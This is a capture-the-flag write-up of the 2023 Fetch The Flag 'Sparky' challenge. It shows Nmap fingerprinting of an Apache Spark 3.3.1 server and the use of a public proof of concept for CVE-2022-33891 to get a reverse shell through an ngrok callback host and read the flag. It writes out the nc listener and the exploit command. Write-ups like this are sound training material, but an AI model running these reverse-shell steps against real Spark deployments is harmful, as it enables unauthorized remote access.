Fetch The Flag 2023 Sparky Writeup

Published: October 28, 2025, updated: October 28, 2025

This is a writeup for the Fetch The Flag 2023 Sparky challenge.

Challenge notes

Alright sparky, here’s another web application test for you. We’re running this in prod but we’ve given you a separate dev instance to test. No source code, no inside info. Just pwn and profit and tell us how you did it!

Press the Start button on the top-right to begin this challenge.

Connect with:

http://challenge.ctf.games:31904/

Nmap

I use Nmap to fingerprint the server:

nmap \
    -Pn \
    -p31904 \
    --script=+http-title.nse \
    --script=+http-server-header.nse \
    challenge.ctf.games

Nmap prints the following:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 17:24 JST
Nmap scan report for challenge.ctf.games (34.123.6.222)
Host is up (0.15s latency).
rDNS record for 34.123.6.222: 222.6.123.34.bc.googleusercontent.com

PORT      STATE SERVICE
31904/tcp open  unknown
|_http-title: Spark Master at spark://0.0.0.0:7077
|_http-server-header: Jetty(9.4.36.v20210114)

Nmap done: 1 IP address (1 host up) scanned in 5.47 seconds

If it runs Jetty, it runs Java. What’s Jetty anyway?

Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. […] 1

Furthermore, Spark Master in the HTTP title means that this runs Apache Spark:

Apache Spark - A Unified engine for large-scale data analytics

Apache Spark is a unified analytics engine for large-scale data processing. It provides high-level APIs in Java, Scala, Python and R, and an optimized engine that supports general execution graphs. […]2

When you visit the site on port 7077, you can see a user interface for observing spark workers and applications:

Spark Master (often written standalone Master) is the resource manager for the Spark Standalone cluster to allocate the resources (CPU, Memory, Disk etc…) among the Spark applications. The resources are used to run the Spark Driver and Executors. 3

Web interface

The machine runs Spark version 3.3.1. The Spark maintainers released version 3.3.1 on 2022-10-254.

This version of Apache Spark is vulnerable to an access control bypass with CVE-2022-338915:

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name.5

Exploit

I’m a script kiddie, so I find an RCE proof of concept exploit for CVE-2022-33891.

I use ngrok and nc to listen for connections. My local port is 5612 and the ngrok remote port is 12884. Here, I launch nc:

nc -v -l 5612

This is how the exploit gives you a reverse shell using the web user interface.

poetry run ./poc.py \
    --url http://challenge.ctf.games \
    --port 31904 \
    --revshell \
    --listeninghost 0.tcp.jp.ngrok.io \
    --listeningport 12884

[*] Reverse shell mode.
[*] Set up your listener by entering the following:
nc -nvlp 12884
[*] When your listener is set up, press enter!
[X] ('Connection aborted.', RemoteDisconnected('Remote end closed connection without response'))

I search for the flag in the nc listener:

sh: 0: can't access tty; job control turned off
$ cat /flag.txt
flag{1cf5f0f135914e5154a6fe20085b0b7a}
$ ⏎

  1. https://eclipse.dev/jetty/ “The Eclipse Jetty Project” ↩︎

  2. https://spark.apache.org/docs/latest/index.html “Apache Spark - A Unified engine for large-scale data analytics” ↩︎

  3. https://stackoverflow.com/a/43944575 “Role of master in Spark standalone cluster” ↩︎

  4. https://spark.apache.org/news/index.html “Spark News” ↩︎

  5. https://nvd.nist.gov/vuln/detail/cve-2022-33891 CVE-2022-33891 ↩︎ ↩︎

Tags

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

Back to Index